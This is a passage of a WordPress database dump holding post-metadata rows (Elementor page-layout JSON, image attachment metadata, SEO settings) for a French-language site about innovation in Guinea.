order_color\":\"#23a455\",\"title_font_size\":{\"unit\":\"px\",\"size\":14},\"use_excerpt\":\"\",\"button_bg_color\":\"#23a455\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"b0tgp49\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8hnfvt3\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(2890,866,'_elementor_version','0.4'),(2891,383,'_elementor_css','a:3:{s:4:\"time\";i:1509551262;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2892,867,'_elementor_edit_mode','builder'),(2893,867,'_elementor_data','[{\"id\":\"8vn8lyd\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"92huazt\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f3r65sd\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"6\"],\"category_border_color\":\"#d8af3c\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"m3it1d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c0estdl\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Follow me on Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(2894,867,'_elementor_version','0.4'),(2895,867,'_elementor_css','a:3:{s:4:\"time\";i:1508941384;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2896,868,'_elementor_edit_mode','builder'),(2897,868,'_elementor_data','[{\"id\":\"8vn8lyd\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"92huazt\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f3r65sd\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"6\"],\"category_border_color\":\"#d8af3c\",\"button_bg_color\":\"#e8c140\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"m3it1d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c0estdl\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Follow me on Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(2898,868,'_elementor_version','0.4'),(2900,869,'_elementor_edit_mode','builder'),(2901,869,'_elementor_data','[{\"id\":\"8vn8lyd\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"92huazt\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f3r65sd\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"6\"],\"category_border_color\":\"#d8af3c\",\"button_bg_color\":\"#e8c140\",\"title_font_size\":{\"unit\":\"px\",\"size\":14},\"use_excerpt\":\"\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"m3it1d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c0estdl\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Follow me on Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(2902,869,'_elementor_version','0.4'),(2903,869,'_elementor_css','a:3:{s:4:\"time\";i:1509551690;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2904,385,'_elementor_css','a:3:{s:4:\"time\";i:1509551935;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2905,870,'_elementor_edit_mode','builder'),(2906,870,'_elementor_data','[{\"id\":\"4jaadzu\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"hh2f5p6\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"fy6i0n0\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"17\"],\"category_border_color\":\"#ff1727\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"sor3acf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"un464qr\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Follow me on Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(2907,870,'_elementor_version','0.4'),(2908,870,'_elementor_css','a:3:{s:4:\"time\";i:1509015828;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2909,871,'_elementor_edit_mode','builder'),(2910,871,'_elementor_data','[{\"id\":\"4jaadzu\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"hh2f5p6\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"fy6i0n0\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"17\"],\"category_border_color\":\"#ff1727\",\"title_font_size\":{\"unit\":\"px\",\"size\":14},\"use_excerpt\":\"\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"sor3acf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"un464qr\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Follow me on Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(2911,871,'_elementor_version','0.4'),(2912,872,'_elementor_edit_mode','builder'),(2913,872,'_elementor_data','[{\"id\":\"4jaadzu\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"hh2f5p6\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"fy6i0n0\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"17\"],\"category_border_color\":\"#ff1727\",\"title_font_size\":{\"unit\":\"px\",\"size\":14},\"use_excerpt\":\"\",\"button_bg_color\":\"#ff1727\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"sor3acf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"un464qr\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Follow me on Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(2914,872,'_elementor_version','0.4'),(2915,359,'_elementor_css','a:3:{s:4:\"time\";i:1509552156;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2920,873,'_elementor_edit_mode','builder'),(2921,873,'_elementor_data','[{\"id\":\"fzhsu66\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"5jp0ahv\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"ojmyu9b\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"1\"],\"category_border_color\":\"#ff5700\",\"title_font_size\":{\"unit\":\"px\",\"size\":14},\"use_excerpt\":\"\",\"button_bg_color\":\"#ff5700\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"rb3u4zv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6ryk8l4\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(2922,873,'_elementor_version','0.4'),(2923,873,'_elementor_css','a:3:{s:4:\"time\";i:1508940166;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2924,538,'_elementor_css','a:3:{s:4:\"time\";i:1509552367;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2925,874,'_elementor_edit_mode','builder'),(2926,874,'_elementor_data','[{\"id\":\"gxjwvcb\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"stretch_section\":\"section-stretched\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"otnhjxz\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"section_background_overlay\":\"\"},\"elements\":[{\"id\":\"06jf78z\",\"elType\":\"widget\",\"settings\":{\"form_select\":\"4\"},\"elements\":[],\"widgetType\":\"magzma-contact-form\"}],\"isInner\":false}],\"isInner\":false}]'),(2927,874,'_elementor_version','0.4'),(2928,874,'_elementor_css','a:3:{s:4:\"time\";i:1509466277;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2930,875,'_elementor_edit_mode','builder'),(2931,875,'_elementor_data','[{\"id\":\"hvualcf\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ea4pbwe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"al1dqdi\",\"elType\":\"widget\",\"settings\":{\"title\":\"+224 625 27 22 90\",\"header_size\":\"h3\",\"title_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"jur7buq\",\"elType\":\"widget\",\"settings\":{\"title\":\"+224 664 61 36 77\",\"header_size\":\"h3\",\"title_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p247jom\",\"elType\":\"widget\",\"settings\":{\"address\":\"kaloum\"},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false},{\"id\":\"qlp485n\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"vymi2q5\",\"elType\":\"widget\",\"settings\":{\"form_select\":\"4\"},\"elements\":[],\"widgetType\":\"magzma-contact-form\"}],\"isInner\":false}],\"isInner\":false}]'),(2932,875,'_elementor_version','0.4'),(2933,875,'_elementor_css','a:3:{s:4:\"time\";i:1509553236;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2934,363,'_elementor_css','a:3:{s:4:\"time\";i:1509553526;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2939,638,'_li_love_count','1'),(2940,613,'_li_love_count','7'),(2941,526,'_elementor_css','a:3:{s:4:\"time\";i:1509708005;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2942,846,'_li_love_count','3'),(2943,632,'_elementor_edit_mode','builder'),(2946,878,'_elementor_data','[{\"id\":\"muazdsg\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"yrwmcrb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"jyagbuw\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Samba Sory Camaraest un ing\\u00e9nieur agricole avec son entreprise agropastoral Business Kinyapa, il pr\\u00f4ne et pratique l\'agriculture Bio et conventionnelle.<\\/p><p>Regardez cette petite vid\\u00e9o...<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ulyp6wx\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"eqfdpa5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tudcifl\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?time_continue=16&v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(2947,878,'_elementor_version','0.4'),(2948,878,'_elementor_css','a:3:{s:4:\"time\";i:1509025795;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2949,878,'_elementor_edit_mode','builder'),(2950,632,'_elementor_css','a:3:{s:4:\"time\";i:1509960673;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2953,880,'_edit_last','1'),(2954,880,'_edit_lock','1511771448:1'),(2959,638,'_elementor_edit_mode','builder'),(2971,888,'_wp_trash_meta_status','publish'),(2972,888,'_wp_trash_meta_time','1510067858'),(2973,889,'_wp_attached_file','2017/11/Guinée.jpg'),(2974,889,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:105;s:6:\"height\";i:75;s:4:\"file\";s:19:\"2017/11/Guinée.jpg\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2975,890,'_wp_attached_file','2017/11/cropped-Guinée.jpg'),(2976,890,'_wp_attachment_context','custom-logo'),(2977,890,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:105;s:6:\"height\";i:47;s:4:\"file\";s:27:\"2017/11/cropped-Guinée.jpg\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2978,891,'_wp_trash_meta_status','publish'),(2979,891,'_wp_trash_meta_time','1510068287'),(2980,892,'_wp_attached_file','2017/11/Guinée-2.png'),(2981,892,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:105;s:6:\"height\";i:75;s:4:\"file\";s:21:\"2017/11/Guinée-2.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2982,893,'_wp_trash_meta_status','publish'),(2983,893,'_wp_trash_meta_time','1510068355'),(2984,894,'_wp_trash_meta_status','publish'),(2985,894,'_wp_trash_meta_time','1510068600'),(2986,897,'_edit_last','1'),(2987,897,'_edit_lock','1510143731:1'),(2988,670,'_li_love_count','16'),(2989,898,'_wp_attached_file','2017/11/JAMES-PIERRE-Un-nouveau-Einstein-en-Afrique-Un-Guinéen-publie...via-torchbrowser.com_.mp4'),(2990,898,'_wp_attachment_metadata','a:9:{s:8:\"filesize\";i:31763474;s:9:\"mime_type\";s:15:\"video/quicktime\";s:6:\"length\";i:368;s:16:\"length_formatted\";s:4:\"6:08\";s:5:\"width\";i:1280;s:6:\"height\";i:720;s:10:\"fileformat\";s:3:\"mp4\";s:10:\"dataformat\";s:9:\"quicktime\";s:5:\"audio\";a:7:{s:10:\"dataformat\";s:3:\"mp4\";s:5:\"codec\";s:19:\"ISO/IEC 14496-3 AAC\";s:11:\"sample_rate\";d:48000;s:8:\"channels\";i:2;s:15:\"bits_per_sample\";i:16;s:8:\"lossless\";b:0;s:11:\"channelmode\";s:6:\"stereo\";}}'),(2992,897,'post_views_count','54'),(2993,897,'_elementor_data','[{\"id\":\"rz91mmy\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"k5jhi4y\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"wlxrdax\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Suivre la vid\\u00e9o ci-dessous...<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2994,899,'_elementor_edit_mode','builder'),(2995,899,'_elementor_data','[{\"id\":\"rz91mmy\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"k5jhi4y\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"wlxrdax\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Suivre la vid\\u00e9o ci-dessous...<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2996,897,'_elementor_version','0.4'),(2997,900,'_wp_attached_file','2017/11/hawing.jpg'),(2998,900,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:696;s:6:\"height\";i:462;s:4:\"file\";s:18:\"2017/11/hawing.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"hawing-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"hawing-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2999,897,'_thumbnail_id','900'),(3000,897,'_wp_page_template','default'),(3003,897,'_yst_is_cornerstone','1'),(3004,897,'_yoast_wpseo_focuskw_text_input','Innovation en Guinée'),(3005,897,'_yoast_wpseo_focuskw','Innovation en Guinée'),(3006,897,'_yoast_wpseo_linkdex','15'),(3007,897,'_yoast_wpseo_content_score','30'),(3008,897,'_yoast_wpseo_primary_category',''),(3009,897,'enclosure','https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/JAMES-PIERRE-Un-nouveau-Einstein-en-Afrique-Un-Guinéen-publie...via-torchbrowser.com_.mp4\n31763474\nvideo/mp4\n'),(3018,662,'_li_love_count','2'),(3019,909,'_edit_last','1'),(3020,909,'_edit_lock','1511196205:1'),(3021,910,'_wp_attached_file','2017/11/eee.jpg'),(3022,910,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:750;s:6:\"height\";i:430;s:4:\"file\";s:15:\"2017/11/eee.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"eee-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"eee-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3023,911,'_wp_attached_file','2017/11/Bhoye-bah.jpg'),(3024,911,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:206;s:6:\"height\";i:206;s:4:\"file\";s:21:\"2017/11/Bhoye-bah.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"Bhoye-bah-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3025,909,'_thumbnail_id','914'),(3026,909,'_wp_page_template','default'),(3029,909,'_yst_is_cornerstone','1'),(3030,909,'_yoast_wpseo_focuskw_text_input','Producteur de café en Guinée'),(3031,909,'_yoast_wpseo_focuskw','Producteur de café en Guinée'),(3032,909,'_yoast_wpseo_linkdex','17'),(3033,909,'_yoast_wpseo_content_score','30'),(3034,909,'_yoast_wpseo_primary_category','2'),(3035,880,'post_views_count','4'),(3036,913,'_elementor_edit_mode','builder'),(3037,913,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":41},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":2},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"title_font_size_mobile\":{\"unit\":\"px\",\